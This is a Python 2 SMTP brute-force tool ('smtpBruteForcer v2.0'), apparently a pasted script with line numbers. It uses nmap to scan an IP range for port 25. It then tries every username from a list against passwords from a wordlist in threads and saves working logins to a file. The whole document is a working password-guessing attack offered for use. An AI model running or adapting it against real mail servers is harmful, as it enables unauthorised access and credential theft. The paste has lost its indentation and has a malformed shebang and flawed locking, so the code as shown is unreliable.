#!usr/bin/python#Smtp Brute Forcer, searches ip_range for hosts using smtp.#

1. #!usr/bin/python
2. #Smtp Brute Forcer, searches ip_range for hosts using smtp.
3. #d3hydr8[at]gmail[dot]com, ZeroCold
4.  
5. import threading, time, StringIO, commands, random, sys, smtplib, re, socket
6. from smtplib import SMTP
7. from copy import copy
8.  
9. def usage():
10. print "\t| Example: ./smtpscan.py 192.168.1.100-200 users.txt passes.txt |"
11. print "\t| Usage: ./smtpscan.py <ip_range> <userlist> <wordlist> |"
12. sys.exit(1)
13.  
14. def banner():
15. print "\n\n\t|###### smtpBruteForcer v2.0 ######|"
16. print "\t| ZeroCold update |"
17. print "\t| Credits: #d3hydr8[at]gmail[dot]com |"
18. print "\t|######|\n\n"
19.  
20. if len(sys.argv) !=4:
21. usage()
22.  
23. try:
24. users = open(sys.argv[2], "r").readlines()
25. except(IOError):
26. print "Error: Check your userlist path\n"
27. sys.exit(1)
28.  
29. try:
30. words = open(sys.argv[3], "r").readlines()
31. except(IOError):
32. print "Error: Check your wordlist path\n"
33. sys.exit(1)
34.  
35. banner()
36. print "[+] Scanning:",sys.argv[1]
37. print "[+] Users Loaded:","(%s)" % sys.argv[2],len(users)
38. print "[+] Words Loaded:","(%s)" % sys.argv[3],len(words)
39.  
40. wordlist = copy(words)
41.  
42. def scan():
43. iprange = sys.argv[1]
44. ip_list = []
45.  
46. try:
47. nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 25')[1]).readlines()
48. except:
49. print "nmap error!"
50.  
51. for tmp in nmap:
52. ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
53. if ipaddr:
54. ip_list.append(ipaddr[0])
55. return ip_list
56.  
57. def reloader():
58. for word in wordlist:
59. words.append(word)
60.  
61. def getword():
62. lock = threading.Lock()
63. lock.acquire()
64. if len(words) != 0:
65. value = random.sample(words, 1)
66. words.remove(value[0])
67.  
68. else:
69. reloader()
70. value = random.sample(words, 1)
71.  
72. lock.release()
73. return value[0][:-1]
74.  
75. class Workhorse(threading.Thread):
76.  
77. def run(self):
78. value = getword()
79. try:
80. print "-"*12
81. print "IP: ", ip, "User: ", user, "Password: ", value
82. smtp = smtplib.SMTP(ip)
83. smtp.login(user[:-1], value)
84. print "\t\nLogin successful:",user, value
85. good = "IP: %s, User: %s, Pass: %s\n" % (ip, user, value)
86. f = open("goodSMTP.txt","a")
87. f.write(good)
88. f.close()
89. smtp.quit()
90. work.join()
91. sys.exit(2)
92. except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
93. pass
94.  
95. ip_list = scan()
96. print "[+] Hosts Loaded:",len(ip_list),"\n"
97.  
98. for ip in ip_list:
99. print "\n\tAttempting BruteForce:",ip,"\n"
100.  
101. try:
102. helo = smtplib.SMTP(ip, timeout=10)
103. print helo.helo(), "\n"
104. helo.quit()
105. except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException):
106. print "\tServer doesn't support the Helo cmd\n"
107.  
108. print "Brute forcing..."
109.  
110. for user in users:
111. for i in range(len(words)):
112. if i == 0: reloader()
113. work = Workhorse()
114. work.start()
115. time.sleep(2)